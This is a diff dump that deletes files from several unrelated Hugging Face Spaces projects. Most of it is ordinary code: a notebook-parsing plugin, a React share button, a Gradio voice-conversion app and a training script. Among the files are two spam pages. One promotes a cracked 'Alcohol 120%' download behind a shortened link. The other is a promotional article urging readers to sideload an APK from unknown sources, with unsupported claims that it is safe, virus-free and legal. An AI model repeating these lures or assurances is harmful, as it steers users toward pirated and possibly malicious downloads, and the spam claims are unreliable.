len(pfg.sp_file_contents) - - inputs_array = [r"This is a Jupyter Notebook file, tell me about Each Block in Chinese. Focus Just On Code." 
+ - r"If a block starts with `Markdown` which means it's a markdown block in ipynb. " + - r"Start a new line for a block and block num use Chinese." + - f"\n\n{frag}" for frag in pfg.sp_file_contents] - inputs_show_user_array = [f"{f}的分析如下" for f in pfg.sp_file_tag] - sys_prompt_array = ["You are a professional programmer."] * n_split - - gpt_response_collection = yield from request_gpt_model_multi_threads_with_very_awesome_ui_and_high_efficiency( - inputs_array=inputs_array, - inputs_show_user_array=inputs_show_user_array, - llm_kwargs=llm_kwargs, - chatbot=chatbot, - history_array=[[""] for _ in range(n_split)], - sys_prompt_array=sys_prompt_array, - # max_workers=5, # OpenAI所允许的最大并行过载 - scroller_max_len=80 - ) - - # <-------- 整理结果,退出 ----------> - block_result = " \n".join(gpt_response_collection) - chatbot.append(("解析的结果如下", block_result)) - history.extend(["解析的结果如下", block_result]) - yield from update_ui(chatbot=chatbot, history=history) # 刷新界面 - - # <-------- 写入文件,退出 ----------> - res = write_results_to_file(history) - chatbot.append(("完成了吗?", res)) - yield from update_ui(chatbot=chatbot, history=history) # 刷新界面 - -@CatchException -def 解析ipynb文件(txt, llm_kwargs, plugin_kwargs, chatbot, history, system_prompt, web_port): - chatbot.append([ - "函数插件功能?", - "对IPynb文件进行解析。Contributor: codycjy."]) - yield from update_ui(chatbot=chatbot, history=history) # 刷新界面 - - history = [] # 清空历史 - import glob - import os - if os.path.exists(txt): - project_folder = txt - else: - if txt == "": - txt = '空空如也的输入栏' - report_execption(chatbot, history, - a=f"解析项目: {txt}", b=f"找不到本地项目或无权访问: {txt}") - yield from update_ui(chatbot=chatbot, history=history) # 刷新界面 - return - if txt.endswith('.ipynb'): - file_manifest = [txt] - else: - file_manifest = [f for f in glob.glob( - f'{project_folder}/**/*.ipynb', recursive=True)] - if len(file_manifest) == 0: - report_execption(chatbot, history, - a=f"解析项目: {txt}", b=f"找不到任何.ipynb文件: {txt}") - yield from update_ui(chatbot=chatbot,
history=history) # 刷新界面 - return - yield from ipynb解释(file_manifest, project_folder, llm_kwargs, plugin_kwargs, chatbot, history, system_prompt, ) diff --git a/spaces/failfast/2D-GameCreator/src/components/Codesandbox.tsx b/spaces/failfast/2D-GameCreator/src/components/Codesandbox.tsx deleted file mode 100644 index 69da1ea9a737609fa37efe393d7ec99c6f068e5c..0000000000000000000000000000000000000000 --- a/spaces/failfast/2D-GameCreator/src/components/Codesandbox.tsx +++ /dev/null @@ -1,25 +0,0 @@ -import axios from "axios"; -import CropSquareIcon from "@mui/icons-material/CropSquare"; -import IconButton from "@mui/material/IconButton"; -import Tooltip from "@mui/material/Tooltip"; -import { ShareProps } from "@/components/GameCreator"; - -export function Codesandbox({ title, content }: ShareProps) { - return ( - /* JSX tags reconstructed from the file's imports; the tooltip label text is an assumption */ - <Tooltip title="CodeSandbox"> - <IconButton - onClick={async () => { - const { data } = await axios.post("/api/url/codesandbox", { - content, - title, - }); - window.open(data, "_blank"); - }} - > - <CropSquareIcon /> - </IconButton> - </Tooltip> - ); -} diff --git a/spaces/falterWliame/Face_Mask_Detection/Alcohol 120 V2.0.3.7520 FINAL Crack [TechTools] Free Download BEST.md b/spaces/falterWliame/Face_Mask_Detection/Alcohol 120 V2.0.3.7520 FINAL Crack [TechTools] Free Download BEST.md deleted file mode 100644 index 1b0aa086dad1ba8ed66ca8161b522646b94a10d2..0000000000000000000000000000000000000000 --- a/spaces/falterWliame/Face_Mask_Detection/Alcohol 120 V2.0.3.7520 FINAL Crack [TechTools] Free Download BEST.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Alcohol 120% V2.0.3.7520 FINAL Crack [TechTools] Free Download


    Download File ⚹⚹⚹ https://urlca.com/2uDcHz



- -Alcohol 120% v2.0.3.7520 FINAL + Crack [TechTools].torrent .torrent. ... Activator (Crack) version 2 . ... user posted image /Download: Alcohol 120% 1.9.5.4521 + Crack ~ 6.3Mb ... Alcohol 120% Free Edition 2.0.3.6828 FE.
    -
    -
    -

    diff --git a/spaces/fartsmellalmao/combined-GI-RVC-models/app-full.py b/spaces/fartsmellalmao/combined-GI-RVC-models/app-full.py deleted file mode 100644 index 74ce5c1b6dbe71dcc896de0b7809b6a32a884495..0000000000000000000000000000000000000000 --- a/spaces/fartsmellalmao/combined-GI-RVC-models/app-full.py +++ /dev/null @@ -1,499 +0,0 @@ -import os -import glob -import json -import traceback -import logging -import gradio as gr -import numpy as np -import librosa -import torch -import asyncio -import edge_tts -import yt_dlp -import ffmpeg -import subprocess -import sys -import io -import wave -from datetime import datetime -from fairseq import checkpoint_utils -from lib.infer_pack.models import ( - SynthesizerTrnMs256NSFsid, - SynthesizerTrnMs256NSFsid_nono, - SynthesizerTrnMs768NSFsid, - SynthesizerTrnMs768NSFsid_nono, -) -from vc_infer_pipeline import VC -from config import Config -config = Config() -logging.getLogger("numba").setLevel(logging.WARNING) -limitation = os.getenv("SYSTEM") == "spaces" - -audio_mode = [] -f0method_mode = [] -f0method_info = "" -if limitation is True: - audio_mode = ["Upload audio", "TTS Audio"] - f0method_mode = ["pm", "harvest"] - f0method_info = "PM is fast, Harvest is good but extremely slow. 
(Default: PM)" -else: - audio_mode = ["Input path", "Upload audio", "Youtube", "TTS Audio"] - f0method_mode = ["pm", "harvest", "crepe"] - f0method_info = "PM is fast, Harvest is good but extremely slow, and Crepe effect is good but requires GPU (Default: PM)" - -def create_vc_fn(model_title, tgt_sr, net_g, vc, if_f0, version, file_index): - def vc_fn( - vc_audio_mode, - vc_input, - vc_upload, - tts_text, - tts_voice, - f0_up_key, - f0_method, - index_rate, - filter_radius, - resample_sr, - rms_mix_rate, - protect, - ): - try: - if vc_audio_mode in ("Input path", "Youtube") and vc_input != "": - audio, sr = librosa.load(vc_input, sr=16000, mono=True) - elif vc_audio_mode == "Upload audio": - if vc_upload is None: - return "You need to upload an audio", None - sampling_rate, audio = vc_upload - duration = audio.shape[0] / sampling_rate - if duration > 20 and limitation: - return "Please upload an audio file that is less than 20 seconds. If you need to generate a longer audio file, please use Colab.", None - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - elif vc_audio_mode == "TTS Audio": - if len(tts_text) > 100 and limitation: - return "Text is too long", None - if tts_text is None or tts_voice is None: - return "You need to enter text and select a voice", None - asyncio.run(edge_tts.Communicate(tts_text, "-".join(tts_voice.split('-')[:-1])).save("tts.mp3")) - audio, sr = librosa.load("tts.mp3", sr=16000, mono=True) - vc_input = "tts.mp3" - times = [0, 0, 0] - f0_up_key = int(f0_up_key) - audio_opt = vc.pipeline( - hubert_model, - net_g, - 0, - audio, - vc_input, - times, - f0_up_key, - f0_method, - file_index, - # file_big_npy, - index_rate, - if_f0, - filter_radius, - tgt_sr, - resample_sr, - rms_mix_rate, - version, - protect, - f0_file=None, - ) - info =
f"[{datetime.now().strftime('%Y-%m-%d %H:%M')}]: npy: {times[0]}, f0: {times[1]}s, infer: {times[2]}s" - print(f"{model_title} | {info}") - return info, (tgt_sr, audio_opt) - except: - info = traceback.format_exc() - print(info) - return info, (None, None) - return vc_fn - -def load_model(): - models = [] - with open(f"weights/model_info.json", "r", encoding="utf-8") as f: - models_info = json.load(f) - for character_name, info in models_info.items(): - if not info['enable']: - continue - model_title = info['title'] - model_name = info['model_path'] - model_author = info.get("author", None) - model_cover = f"weights/{character_name}/{info['cover']}" - model_index = f"weights/{character_name}/{info['feature_retrieval_library']}" - cpt = torch.load(f"weights/{character_name}/{model_name}", map_location="cpu") - tgt_sr = cpt["config"][-1] - cpt["config"][-3] = cpt["weight"]["emb_g.weight"].shape[0] # n_spk - if_f0 = cpt.get("f0", 1) - version = cpt.get("version", "v1") - if version == "v1": - if if_f0 == 1: - net_g = SynthesizerTrnMs256NSFsid(*cpt["config"], is_half=config.is_half) - else: - net_g = SynthesizerTrnMs256NSFsid_nono(*cpt["config"]) - model_version = "V1" - elif version == "v2": - if if_f0 == 1: - net_g = SynthesizerTrnMs768NSFsid(*cpt["config"], is_half=config.is_half) - else: - net_g = SynthesizerTrnMs768NSFsid_nono(*cpt["config"]) - model_version = "V2" - del net_g.enc_q - print(net_g.load_state_dict(cpt["weight"], strict=False)) - net_g.eval().to(config.device) - if config.is_half: - net_g = net_g.half() - else: - net_g = net_g.float() - vc = VC(tgt_sr, config) - print(f"Model loaded: {character_name} / {info['feature_retrieval_library']} | ({model_version})") - models.append((character_name, model_title, model_author, model_cover, model_version, create_vc_fn(model_title, tgt_sr, net_g, vc, if_f0, version, model_index))) - return models - -def cut_vocal_and_inst(url, audio_provider, split_model): - if url != "": - if not os.path.exists("dl_audio"): - 
os.mkdir("dl_audio") - if audio_provider == "Youtube": - ydl_opts = { - 'format': 'bestaudio/best', - 'postprocessors': [{ - 'key': 'FFmpegExtractAudio', - 'preferredcodec': 'wav', - }], - "outtmpl": 'dl_audio/youtube_audio', - } - with yt_dlp.YoutubeDL(ydl_opts) as ydl: - ydl.download([url]) - audio_path = "dl_audio/youtube_audio.wav" - else: - # Spotify doesnt work. - # Need to find other solution soon. - ''' - command = f"spotdl download {url} --output dl_audio/.wav" - result = subprocess.run(command.split(), stdout=subprocess.PIPE) - print(result.stdout.decode()) - audio_path = "dl_audio/spotify_audio.wav" - ''' - if split_model == "htdemucs": - command = f"demucs --two-stems=vocals {audio_path} -o output" - result = subprocess.run(command.split(), stdout=subprocess.PIPE) - print(result.stdout.decode()) - return "output/htdemucs/youtube_audio/vocals.wav", "output/htdemucs/youtube_audio/no_vocals.wav", audio_path, "output/htdemucs/youtube_audio/vocals.wav" - else: - command = f"demucs --two-stems=vocals -n mdx_extra_q {audio_path} -o output" - result = subprocess.run(command.split(), stdout=subprocess.PIPE) - print(result.stdout.decode()) - return "output/mdx_extra_q/youtube_audio/vocals.wav", "output/mdx_extra_q/youtube_audio/no_vocals.wav", audio_path, "output/mdx_extra_q/youtube_audio/vocals.wav" - else: - raise gr.Error("URL Required!") - return None, None, None, None - -def combine_vocal_and_inst(audio_data, audio_volume, split_model): - if not os.path.exists("output/result"): - os.mkdir("output/result") - vocal_path = "output/result/output.wav" - output_path = "output/result/combine.mp3" - if split_model == "htdemucs": - inst_path = "output/htdemucs/youtube_audio/no_vocals.wav" - else: - inst_path = "output/mdx_extra_q/youtube_audio/no_vocals.wav" - with wave.open(vocal_path, "w") as wave_file: - wave_file.setnchannels(1) - wave_file.setsampwidth(2) - wave_file.setframerate(audio_data[0]) - wave_file.writeframes(audio_data[1].tobytes()) - command = 
f'ffmpeg -y -i {inst_path} -i {vocal_path} -filter_complex [1:a]volume={audio_volume}dB[v];[0:a][v]amix=inputs=2:duration=longest -b:a 320k -c:a libmp3lame {output_path}' - result = subprocess.run(command.split(), stdout=subprocess.PIPE) - print(result.stdout.decode()) - return output_path - -def load_hubert(): - global hubert_model - models, _, _ = checkpoint_utils.load_model_ensemble_and_task( - ["hubert_base.pt"], - suffix="", - ) - hubert_model = models[0] - hubert_model = hubert_model.to(config.device) - if config.is_half: - hubert_model = hubert_model.half() - else: - hubert_model = hubert_model.float() - hubert_model.eval() - -def change_audio_mode(vc_audio_mode): - if vc_audio_mode == "Input path": - return ( - # Input & Upload - gr.Textbox.update(visible=True), - gr.Audio.update(visible=False), - # Youtube - gr.Dropdown.update(visible=False), - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False), - gr.Button.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Slider.update(visible=False), - gr.Audio.update(visible=False), - gr.Button.update(visible=False), - # TTS - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False) - ) - elif vc_audio_mode == "Upload audio": - return ( - # Input & Upload - gr.Textbox.update(visible=False), - gr.Audio.update(visible=True), - # Youtube - gr.Dropdown.update(visible=False), - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False), - gr.Button.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Slider.update(visible=False), - gr.Audio.update(visible=False), - gr.Button.update(visible=False), - # TTS - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False) - ) - elif vc_audio_mode == "Youtube": - return ( - # Input & Upload - gr.Textbox.update(visible=False), - gr.Audio.update(visible=False), - # Youtube - 
gr.Dropdown.update(visible=True), - gr.Textbox.update(visible=True), - gr.Dropdown.update(visible=True), - gr.Button.update(visible=True), - gr.Audio.update(visible=True), - gr.Audio.update(visible=True), - gr.Audio.update(visible=True), - gr.Slider.update(visible=True), - gr.Audio.update(visible=True), - gr.Button.update(visible=True), - # TTS - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False) - ) - elif vc_audio_mode == "TTS Audio": - return ( - # Input & Upload - gr.Textbox.update(visible=False), - gr.Audio.update(visible=False), - # Youtube - gr.Dropdown.update(visible=False), - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False), - gr.Button.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Slider.update(visible=False), - gr.Audio.update(visible=False), - gr.Button.update(visible=False), - # TTS - gr.Textbox.update(visible=True), - gr.Dropdown.update(visible=True) - ) - else: - return ( - # Input & Upload - gr.Textbox.update(visible=False), - gr.Audio.update(visible=True), - # Youtube - gr.Dropdown.update(visible=False), - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False), - gr.Button.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Audio.update(visible=False), - gr.Slider.update(visible=False), - gr.Audio.update(visible=False), - gr.Button.update(visible=False), - # TTS - gr.Textbox.update(visible=False), - gr.Dropdown.update(visible=False) - ) - -if __name__ == '__main__': - load_hubert() - models = load_model() - tts_voice_list = asyncio.get_event_loop().run_until_complete(edge_tts.list_voices()) - voices = [f"{v['ShortName']}-{v['Gender']}" for v in tts_voice_list] - with gr.Blocks() as app: - gr.Markdown( - "#
    Combined Genshin Impact RVC Models\n" - "##
    The input audio should be clean and pure voice without background music.\n" - "###
    It is recommended to use google colab for more features. \n" - "[![image](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/1Tgr6q9kKiB5P37rUitrB3CsNl8JP9iQZ?usp=sharing)\n\n" - "[![Original Repo](https://badgen.net/badge/icon/github?icon=github&label=Original%20Repo)](https://github.com/RVC-Project/Retrieval-based-Voice-Conversion-WebUI)" - ) - with gr.Tabs(): - for (name, title, author, cover, model_version, vc_fn) in models: - with gr.TabItem(name): - with gr.Row(): - gr.Markdown( - '
    ' - f'
    {title}
    \n'+ - f'
    RVC {model_version} Model
    \n'+ - (f'
    Model author: {author}
    ' if author else "")+ - (f'' if cover else "")+ - '
    ' - ) - with gr.Row(): - with gr.Column(): - vc_audio_mode = gr.Dropdown(label="Input voice", choices=audio_mode, allow_custom_value=False, value="Upload audio") - # Input and Upload - vc_input = gr.Textbox(label="Input audio path", visible=False) - vc_upload = gr.Audio(label="Upload audio file", visible=True, interactive=True) - # Youtube - vc_download_audio = gr.Dropdown(label="Provider", choices=["Youtube"], allow_custom_value=False, visible=False, value="Youtube", info="Select provider (Default: Youtube)") - vc_link = gr.Textbox(label="Youtube URL", visible=False, info="Example: https://www.youtube.com/watch?v=Nc0sB1Bmf-A", placeholder="https://www.youtube.com/watch?v=...") - vc_split_model = gr.Dropdown(label="Splitter Model", choices=["htdemucs", "mdx_extra_q"], allow_custom_value=False, visible=False, value="htdemucs", info="Select the splitter model (Default: htdemucs)") - vc_split = gr.Button("Split Audio", variant="primary", visible=False) - vc_vocal_preview = gr.Audio(label="Vocal Preview", visible=False) - vc_inst_preview = gr.Audio(label="Instrumental Preview", visible=False) - vc_audio_preview = gr.Audio(label="Audio Preview", visible=False) - # TTS - tts_text = gr.Textbox(visible=False, label="TTS text", info="Text to speech input") - tts_voice = gr.Dropdown(label="Edge-tts speaker", choices=voices, visible=False, allow_custom_value=False, value="en-US-AnaNeural-Female") - with gr.Column(): - vc_transform0 = gr.Number(label="Transpose", value=0, info='Type "12" to change from male to female voice. 
Type "-12" to change female to male voice') - f0method0 = gr.Radio( - label="Pitch extraction algorithm", - info=f0method_info, - choices=f0method_mode, - value="pm", - interactive=True - ) - index_rate1 = gr.Slider( - minimum=0, - maximum=1, - label="Retrieval feature ratio", - info="(Default: 0.6)", - value=0.6, - interactive=True, - ) - filter_radius0 = gr.Slider( - minimum=0, - maximum=7, - label="Apply Median Filtering", - info="The value represents the filter radius and can reduce breathiness.", - value=3, - step=1, - interactive=True, - ) - resample_sr0 = gr.Slider( - minimum=0, - maximum=48000, - label="Resample the output audio", - info="Resample the output audio in post-processing to the final sample rate. Set to 0 for no resampling", - value=0, - step=1, - interactive=True, - ) - rms_mix_rate0 = gr.Slider( - minimum=0, - maximum=1, - label="Volume Envelope", - info="Use the volume envelope of the input to replace or mix with the volume envelope of the output. The closer the ratio is to 1, the more the output envelope is used", - value=1, - interactive=True, - ) - protect0 = gr.Slider( - minimum=0, - maximum=0.5, - label="Voice Protection", - info="Protect voiceless consonants and breath sounds to prevent artifacts such as tearing in electronic music. Set to 0.5 to disable.
Decrease the value to increase protection, but it may reduce indexing accuracy", - value=0.5, - step=0.01, - interactive=True, - ) - with gr.Column(): - vc_log = gr.Textbox(label="Output Information", interactive=False) - vc_output = gr.Audio(label="Output Audio", interactive=False) - vc_convert = gr.Button("Convert", variant="primary") - vc_volume = gr.Slider( - minimum=0, - maximum=10, - label="Vocal volume", - value=4, - interactive=True, - step=1, - info="Adjust vocal volume (Default: 4)", - visible=False - ) - vc_combined_output = gr.Audio(label="Output Combined Audio", visible=False) - vc_combine = gr.Button("Combine", variant="primary", visible=False) - vc_convert.click( - fn=vc_fn, - inputs=[ - vc_audio_mode, - vc_input, - vc_upload, - tts_text, - tts_voice, - vc_transform0, - f0method0, - index_rate1, - filter_radius0, - resample_sr0, - rms_mix_rate0, - protect0, - ], - outputs=[vc_log, vc_output] - ) - vc_split.click( - fn=cut_vocal_and_inst, - inputs=[vc_link, vc_download_audio, vc_split_model], - outputs=[vc_vocal_preview, vc_inst_preview, vc_audio_preview, vc_input] - ) - vc_combine.click( - fn=combine_vocal_and_inst, - inputs=[vc_output, vc_volume, vc_split_model], - outputs=[vc_combined_output] - ) - vc_audio_mode.change( - fn=change_audio_mode, - inputs=[vc_audio_mode], - outputs=[ - vc_input, - vc_upload, - vc_download_audio, - vc_link, - vc_split_model, - vc_split, - vc_vocal_preview, - vc_inst_preview, - vc_audio_preview, - vc_volume, - vc_combined_output, - vc_combine, - tts_text, - tts_voice - ] - ) - gr.Markdown('#
    Changelog 2023.06.28') - gr.Markdown('- Added Heizou-jp, Cyno-jp, Venti-jp, Chongyun-jp, Thoma-jp and Lumine-jp') - gr.Markdown('- Major fix and adjustment') - app.queue(concurrency_count=1, max_size=20, api_open=config.api).launch(share=config.colab) \ No newline at end of file diff --git a/spaces/fatiXbelha/sd/233 Playground How to Download and Play the Hottest Android Games.md b/spaces/fatiXbelha/sd/233 Playground How to Download and Play the Hottest Android Games.md deleted file mode 100644 index 203592292895b92a013d75d12b7238bcf4941b7f..0000000000000000000000000000000000000000 --- a/spaces/fatiXbelha/sd/233 Playground How to Download and Play the Hottest Android Games.md +++ /dev/null @@ -1,75 +0,0 @@ -
    -

    Download 233: What Is It and How to Use It?

    -

    If you are a fan of mobile games, you might have heard of download 233, a Chinese gaming platform that allows you to play millions of games without downloading or installing them. But what exactly is download 233 and how can you use it to enjoy your favorite games? In this article, we will answer these questions and show you how to download and use download 233 on your Android device.

    -

    Introduction

    -

    What is download 233?

    -

    Download 233 is a mobile gaming platform developed by MetaApp, a leading mobile game company in China. Download 233 provides access to over 2 million native games from various genres, such as casual, action, puzzle, simulation, and more. You can play any game you want with just one tap, without downloading or installing anything on your phone. Download 233 also offers monetization, localization, and user acquisition services for game developers who want to reach the Chinese market.

    -

    download 233


    DOWNLOAD --->>> https://urllie.com/2uNwu7



    -

    Why use download 233?

    -

    There are many benefits of using download 233 to play games on your phone. Here are some of them:

    -
      -
• You can save storage space and data usage by not downloading or installing games.
• You can discover new and high-quality games from all over the world.
• You can enjoy fast and smooth gameplay with no lag or glitches.
• You can switch between different games easily and quickly.
• You can get personalized recommendations based on your preferences and behavior.
    -

    How to download and install download 233?

    -

    Step 1: Visit the official website or download the APK file

    -

    To use download 233, you need to have an Android device with Android version 4.4 or higher. You can either visit the official website of download 233 at www.233game.com or download the APK file from jalantikus.com. The APK file size is about 20 MB and it is safe and virus-free.

    -

    Step 2: Allow installation from unknown sources

    -

Since download 233 is not available on the Google Play Store, you need to enable installation from unknown sources in your phone's settings. To do this, go to Settings > Security > Unknown Sources and toggle it on. This will allow you to install apps from sources other than the Google Play Store.

    -

    Step 3: Install and launch the app

    -

    After you have downloaded the APK file, locate it on your phone's file manager and tap on it to start the installation process. Follow the instructions on the screen and wait for a few seconds until the app is installed. Then, launch the app by tapping on its icon on your home screen or app drawer.

    -

    How to use download 233 to play games?

    -

    Step 1: Browse or search for games

    -

    Once you have opened the app, you will see a variety of games displayed on the main screen. You can browse through different categories, such as daily discover, feature section, pre-order, casual, action, simulation, etc. You can also use the search bar at the top to find specific games by name or keyword.


    Step 2: Tap on the game icon to start playing


    When you find a game that interests you, simply tap on the game icon to start playing. You will see a loading screen for a few seconds and then the game will launch. You can play the game as long as you want without any interruption or limitation.


    Step 3: Enjoy the game without downloading or installing


    As you play, you will notice that the graphics and sound quality are excellent and the gameplay is smooth and fast. You will not experience lag or glitches even on a low-end device or a weak internet connection. You can pause, resume, or exit the game at any time, and you can also rate, review, or share the game with your friends.


    Conclusion


    Summary of the main points


    Download 233 is a mobile gaming platform that lets you play millions of games without downloading or installing them. It is easy to use and offers many benefits: it saves storage space and data usage, helps you discover new and high-quality games, delivers fast and smooth gameplay, lets you switch between games quickly and easily, and gives you personalized recommendations. All you need is an Android device running Android 4.4 or higher and an internet connection.


    Call to action and recommendation


    If you are looking for a new and exciting way to play games on your phone, download 233 is the perfect choice for you. You can download it from www.233game.com or jalantikus.com and start playing right away. You will be amazed by how many games you can play with just one tap. Download 233 is the ultimate mobile gaming platform for gamers of all ages and preferences. Try it today and have fun!


    FAQs

    - Q: Is download 233 free?
      A: Yes, download 233 is completely free to use. You can play any game you want without paying anything.
    - Q: Is download 233 safe?
      A: Yes, download 233 is safe and virus-free. It does not contain any malware or spyware that can harm your device or data.
    - Q: Is download 233 legal?
      A: Yes, download 233 is legal and compliant with the laws and regulations of China and other countries. It does not violate any intellectual property rights or privacy policies of the game developers or publishers.
    - Q: How does download 233 work?
      A: Download 233 works by streaming game data from cloud servers to your device in real time. It does not store any game data on your device or consume any storage space.
    - Q: What are the requirements to use download 233?
      A: To use download 233, you need an Android device with Android version 4.4 or higher and an internet connection (Wi-Fi or mobile data).

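The FAQ's description of how download 233 works — streaming game data from the cloud rather than storing it on the device — can be illustrated with a minimal client loop. This is a toy sketch under stated assumptions, not download 233's actual protocol: a generator stands in for the network, frames pass through a small in-memory buffer, and each frame is discarded after "rendering", so nothing ever touches local storage.

```python
from collections import deque


def cloud_frames(n_frames: int):
    """Stand-in for a cloud server: yields encoded frames one at a time.
    A real service would send compressed video frames over the network."""
    for i in range(n_frames):
        yield f"frame-{i}".encode()


def stream_game(n_frames: int = 5, buffer_size: int = 2):
    """Client loop: keep only a tiny rolling buffer, never write to disk."""
    buffer = deque(maxlen=buffer_size)  # transient in-memory buffer only
    rendered = 0
    for frame in cloud_frames(n_frames):
        buffer.append(frame)  # oldest frame is dropped automatically
        rendered += 1         # "render" the frame, then let it go
    return rendered


print(stream_game())  # prints 5
```

The key property the FAQ claims — zero storage footprint — comes from the bounded `deque`: memory use is constant no matter how long you play, which is why pausing, resuming, or exiting leaves nothing behind on the device.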
    \ No newline at end of file diff --git a/spaces/fclong/summary/fengshen/examples/zen1_finetune/ner_zen1_ontonotes4.sh b/spaces/fclong/summary/fengshen/examples/zen1_finetune/ner_zen1_ontonotes4.sh deleted file mode 100644 index be51a3f3d709d761b6dcb4e5759cc5b92a09a609..0000000000000000000000000000000000000000 --- a/spaces/fclong/summary/fengshen/examples/zen1_finetune/ner_zen1_ontonotes4.sh +++ /dev/null @@ -1,91 +0,0 @@ -#!/bin/bash -#SBATCH --job-name=zen1_base_ontonotes4 # create a short name for your job -#SBATCH --nodes=1 # node count -#SBATCH --ntasks=1 # total number of tasks across all nodes -#SBATCH --cpus-per-task=30 # cpu-cores per task (>1 if multi-threaded tasks) -#SBATCH --gres=gpu:1 # number of gpus per node -#SBATCH --mail-type=ALL # send email when job begins, ends or failed etc. -#SBATCH -o /cognitive_comp/ganruyi/experiments/ner_finetune/zen1_base_ontonotes4/%x-%j.log # output and error file name (%x=job name, %j=job id) - - -export CUDA_VISIBLE_DEVICES='1' -export TORCH_EXTENSIONS_DIR=/cognitive_comp/ganruyi/tmp/torch_extendsions - -MODEL_NAME=zen1_base - -TASK=ontonotes4 - -ZERO_STAGE=1 -STRATEGY=deepspeed_stage_${ZERO_STAGE} - -ROOT_DIR=/cognitive_comp/ganruyi/experiments/ner_finetune/${MODEL_NAME}_${TASK} -if [ ! -d ${ROOT_DIR} ];then - mkdir -p ${ROOT_DIR} - echo ${ROOT_DIR} created!!!!!!!!!!!!!! -else - echo ${ROOT_DIR} exist!!!!!!!!!!!!!!! 
-fi - -DATA_DIR=/cognitive_comp/lujunyu/data_zh/NER_Aligned/OntoNotes4/ -PRETRAINED_MODEL_PATH=/cognitive_comp/ganruyi/hf_models/zen/ZEN_pretrain_base_v0.1.0 - -CHECKPOINT_PATH=${ROOT_DIR}/ckpt/ -OUTPUT_PATH=${ROOT_DIR}/predict.json - -DATA_ARGS="\ - --data_dir $DATA_DIR \ - --train_data train.char.bmes \ - --valid_data test.char.bmes \ - --test_data test.char.bmes \ - --train_batchsize 64 \ - --valid_batchsize 16 \ - --max_seq_length 128 \ - --task_name ontonotes4 \ - " - -MODEL_ARGS="\ - --learning_rate 3e-5 \ - --weight_decay 0.1 \ - --warmup_ratio 0.01 \ - --markup bioes \ - --middle_prefix M- \ - " - -MODEL_CHECKPOINT_ARGS="\ - --monitor val_f1 \ - --save_top_k 3 \ - --mode max \ - --every_n_train_steps 200 \ - --save_weights_only True \ - --dirpath $CHECKPOINT_PATH \ - --filename model-{epoch:02d}-{val_f1:.4f} \ - " - -TRAINER_ARGS="\ - --max_epochs 30 \ - --gpus 1 \ - --check_val_every_n_epoch 1 \ - --val_check_interval 200 \ - --default_root_dir $ROOT_DIR \ - " - - -options=" \ - --pretrained_model_path $PRETRAINED_MODEL_PATH \ - --vocab_file $PRETRAINED_MODEL_PATH/vocab.txt \ - --do_lower_case \ - --output_save_path $OUTPUT_PATH \ - $DATA_ARGS \ - $MODEL_ARGS \ - $MODEL_CHECKPOINT_ARGS \ - $TRAINER_ARGS \ -" -SCRIPT_PATH=/cognitive_comp/ganruyi/Fengshenbang-LM/fengshen/examples/zen1_finetune/fengshen_token_level_ft_task.py -/home/ganruyi/anaconda3/bin/python $SCRIPT_PATH $options - -# SINGULARITY_PATH=/cognitive_comp/ganruyi/pytorch21_06_py3_docker_image_v2.sif -# python3 $SCRIPT_PATH $options -# source activate base -# singularity exec --nv -B /cognitive_comp/:/cognitive_comp/ $SINGULARITY_PATH /home/ganruyi/anaconda3/bin/python $SCRIPT_PATH $options -# /home/ganruyi/anaconda3/bin/python $SCRIPT_PATH $options - diff --git a/spaces/fffiloni/Image-to-MusicGen/audiocraft/modules/__init__.py b/spaces/fffiloni/Image-to-MusicGen/audiocraft/modules/__init__.py deleted file mode 100644 index 
81ba30f6466ff91b90490a4fb92f7d3d0d00144d..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/Image-to-MusicGen/audiocraft/modules/__init__.py +++ /dev/null @@ -1,20 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -# flake8: noqa -from .conv import ( - NormConv1d, - NormConv2d, - NormConvTranspose1d, - NormConvTranspose2d, - StreamableConv1d, - StreamableConvTranspose1d, - pad_for_conv1d, - pad1d, - unpad1d, -) -from .lstm import StreamableLSTM -from .seanet import SEANetEncoder, SEANetDecoder diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/content-type/index.js b/spaces/fffiloni/controlnet-animation-doodle/node_modules/content-type/index.js deleted file mode 100644 index 41840e7bc3e48cda894597cd18e562a37a174f7c..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/content-type/index.js +++ /dev/null @@ -1,225 +0,0 @@ -/*! - * content-type - * Copyright(c) 2015 Douglas Christopher Wilson - * MIT Licensed - */ - -'use strict' - -/** - * RegExp to match *( ";" parameter ) in RFC 7231 sec 3.1.1.1 - * - * parameter = token "=" ( token / quoted-string ) - * token = 1*tchar - * tchar = "!" / "#" / "$" / "%" / "&" / "'" / "*" - * / "+" / "-" / "." 
